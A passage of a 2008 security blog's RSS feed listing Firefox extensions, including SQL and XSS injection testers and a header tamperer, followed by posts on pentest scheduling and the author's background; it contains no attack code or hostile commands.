<p><a href="https://addons.mozilla.org/en-US/firefox/addon/115"><strong>ReloadEvery &#8211; reloadevery-2.0-fx.xpi</strong></a><br />
Reloads web pages every so many seconds or minutes. The function is accessible via the context menu (menu you get when you right click on a web page) or via a drop down menu on the reload button</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/2993"><strong>Shazou &#8211; shazou-2.1-fx.xpi</strong></a><br />
Finally mapping is integrated with the Firefox browser. The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo-locate any website they are currently viewing.<br />
<strong><br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/590"> ShowIP &#8211; showip-0.8.08r14b0251-fx+mz.xpi</a></strong><br />
Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right mouse button) and hostname (left mouse button), like whois, netcraft. Additionally you can copy the IP address to the clipboard.</p>
<p><a href="http://securitycompass.com/exploitme.shtml"><strong>SQL Inject Me &#8211; sqlime-0.2.xpi [Doesn't Work with FF3]</strong></a><br />
SQL Injection vulnerabilites can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1122"><strong>Tab Mix Plus &#8211; tab_mix_plus-dev-build.xpi</strong></a><br />
Tab Mix Plus enhances Firefox&#8217;s tab browsing capabilities. It includes such features as duplicating tabs, controlling tab focus, tab clicking options, undo closed tabs and windows, plus much more. It also includes a full-featured session manager.<br />
<strong><br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/966"> TamperData &#8211; tamper_data-10.1.0-fx.xpi</a></strong><br />
Use tamperdata to view and modify HTTP/HTTPS headers and post parameters. Trace and time http response/requests. Security test web applications by modifying POST parameters.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1813"><strong>TrashMail.net &#8211; trashmail.net-1.0.12-fx.xpi</strong></a><br />
Create free disposable email addresses and paste them directly in forms. This helps to protect you from spam mails and could be useful when subscribing to forums or newsletters</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/5081"><strong>TwitterFox &#8211; twitterfox-1.7-fx.xpi</strong></a><br />
TwitterFox is a Firefox extension that notifies you of your friends&#8217; statuses of Twitter.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/59"><strong>User Agent Switcher &#8211; user_agent_switcher-0.6.11-fx+sm.xpi</strong></a><br />
Adds a menu and a toolbar button to switch the user agent of the browser.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/60"><strong>Web Developer Toolbar &#8211; web_developer-1.1.6-fx.xpi</strong></a><br />
Adds a menu and a toolbar with various web developer tools.</p>
<p><a href="http://securitycompass.com/exploitme.shtml"><strong>XSS Inject Me &#8211; xssme-0.2.1.xpi [Doesn't Work with FF3]</strong></a><br />
Cross-Site Scripting (XSS) is a common flaw found in todays web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS</p>
<p>you can download them all as one big zip <a href="http://www.0x0e.net/x/firefoxPlugins09232008.zip">here</a>.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/92/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=92&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2008/09/23/firefox-extensions-dump/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>
	</item>
		<item>
		<title>Pentesting Timelines</title>
		<link>http://hexesec.wordpress.com/2008/07/07/pentest-delivery-timeline/</link>
		<comments>http://hexesec.wordpress.com/2008/07/07/pentest-delivery-timeline/#comments</comments>
		<pubDate>Mon, 07 Jul 2008 02:33:53 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[pentest]]></category>
		<category><![CDATA[timeline]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/?p=13</guid>
		<description><![CDATA[I&#8217;ve often run into the case of the network that simply can&#8217;t be satisfactorily tested in the time allotted to it. There are a couple reasons for this: tight budgets, sales processes that lead to &#8220;cookie-cutter&#8221; penetest sales, poor scoping, etc.
The typical solution to this is to document what could not be completed or tested [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=13&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>I&#8217;ve often run into the case of the network that simply can&#8217;t be satisfactorily tested in the time allotted to it. There are a couple reasons for this: tight budgets, sales processes that lead to &#8220;cookie-cutter&#8221; penetest sales, poor scoping, etc.</p>
<p>The typical solution to this is to document what could not be completed or tested fully and present this to the client. This is frustrating to both the pentester (who scoped the work) and the client (who likely expected the work to fully be completed on time).</p>
<p>I&#8217;m wondering if there&#8217;s a better way to do such work.</p>
<p>What if a pentest could be scheduled to happen over a two/three month period in which the client would be aware the the pentest could happen at any time, but wouldn&#8217;t be expecting malicious traffic at any given moment.</p>
<p>There are obvious benefits to such a situation:</p>
<ul>
<li>The pentester has a more relaxed schedule to execute an attack.</li>
<li>The attacks can be more complex, as there is more time to plan.</li>
<li>The client&#8217;s defense can be more accurately tested (as they won&#8217;t be fully expecting the attack when it happens).</li>
</ul>
<p>And obvious drawbacks:</p>
<ul>
<li>The client needs to trust the pentester / pentester&#8217;s firm that they&#8217;re getting a fair share of time / work (A project plan and an unabridged log of work completed  would help in this situation).</li>
<li>Project management would be more difficult. How do you ensure that you, as a tester, are giving adequate attention to a project?</li>
<li>The client couldn&#8217;t be under any time crunch (This happens more often than you would expect).</li>
</ul>
<p>This could even be taken to the next level by putting a pentester on retainer, and ensuring that the network is fully examined every ~month. This seems the natural way to ensure complete and continuing coverage.</p>
<p>What are your thoughts? Is this a good / bad idea? How would you respond as a network manager? As a pentester?</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hexesec.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hexesec.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=13&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2008/07/07/pentest-delivery-timeline/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>
	</item>
		<item>
		<title>Disclosure</title>
		<link>http://hexesec.wordpress.com/2008/07/05/disclosure/</link>
		<comments>http://hexesec.wordpress.com/2008/07/05/disclosure/#comments</comments>
		<pubDate>Sat, 05 Jul 2008 18:33:40 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[disclosure]]></category>
		<category><![CDATA[hexEsec]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/?p=5</guid>
		<description><![CDATA[About Me:
A pentester for a growing vulnerability assessment (product) firm.  My background is in computer science and i have no strict formal education in security. I&#8217;ve only recently gotten into the field, though i&#8217;ve been fascinated by computers and networks as long as i can remember.
My goals for hexESec are fairly straightforward:
- Keep track of [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=5&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>About Me:<br />
A pentester for a growing vulnerability assessment (product) firm.  My background is in computer science and i have no strict formal education in security. I&#8217;ve only recently gotten into the field, though i&#8217;ve been fascinated by computers and networks as long as i can remember.</p>
<p>My goals for hexESec are fairly straightforward:<br />
- Keep track of interesting ideas, thoughts, and information in a public forum.<br />
- Promote current work and projects.<br />
- Build and maintain some semblance of a (good) reputation.<br />
- Encourage others to share their ideas.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hexesec.wordpress.com/5/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hexesec.wordpress.com/5/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=5&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2008/07/05/disclosure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>
	</item>
	</channel>
</rss>